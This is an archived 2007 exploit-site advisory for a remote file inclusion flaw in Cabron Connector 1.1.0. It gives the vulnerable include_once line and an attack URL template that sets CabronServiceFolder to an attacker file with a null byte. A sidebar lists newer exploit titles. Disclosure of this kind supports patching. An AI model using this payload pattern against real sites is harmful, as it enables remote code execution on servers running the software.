exploits , vulnerabilities , articles , Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability

2007-04-17

Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability

Rated as : Moderate Risk

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   Cabron Connector v1.1.0 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://cabron.sourceforge.net
* Vuln:     
http://[Target]/[Path]/services/samples/inclusionService.php?CabronServiceFolder=[EvilTxt]%00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code: 
            
include_once("$CabronServiceFolder/lib/includedFunction.php");  
<== Line(1)

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
securitydot.net - 2007-04-17

Exploits - newest 10 RSS | More

2007-06-15 57001 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34039 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42177 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29211 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19643 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16604 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19290 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16469 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33459 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17129 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit